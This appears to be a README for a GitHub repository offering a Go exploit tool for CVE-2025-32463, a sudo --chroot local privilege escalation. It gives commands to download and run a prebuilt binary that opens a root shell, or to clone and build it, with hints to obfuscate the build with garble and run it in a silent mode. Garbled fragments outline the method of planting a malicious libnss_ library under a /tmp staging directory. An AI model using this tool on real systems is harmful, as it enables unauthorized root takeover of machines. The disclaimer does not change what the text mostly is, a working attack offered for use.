
This CVE addresses a vulnerability in sudo versions 1.9.14 to 1.9.17, enabling unauthorized local privilege escalation to root access.
This repository provides a Go-based exploit tool for CVE-2025-32463, a critical local privilege escalation vulnerability (CVSS 9.3) in sudo versions 1.9.14 to 1.9.17. It allows unauthorized local users to gain root access by exploiting a flaw in the --chroot (-R) option.
⚠️ Warning: For educational and testing purposes only. Use in isolated environments (e.g., VMs). Not for malicious use.
--chroot permissionscurl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # Launches root shell
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # Or use garble for obfuscation
./exploit --execution
| Command | Description |
|---|---|
./exploit --help | Show usage help |
./exploit --about | Display CVE details |
Verification: In the root shell, run id (should show uid=0(root)) or whoami (should show root).
/tmp/sudowoot.stage.*woot1337.c) for root shelllibnss_/woot1337.so.2)sudo -R woot woot to load lib and escalateDefaults !use_chroot to /etc/sudoersThis tool is for security research. The author is not responsible for misuse. Always test responsibly.
Built by MNM
./exploit --execution | Run exploit (opens root shell) |
./exploit --execution --silent | Silent mode execution |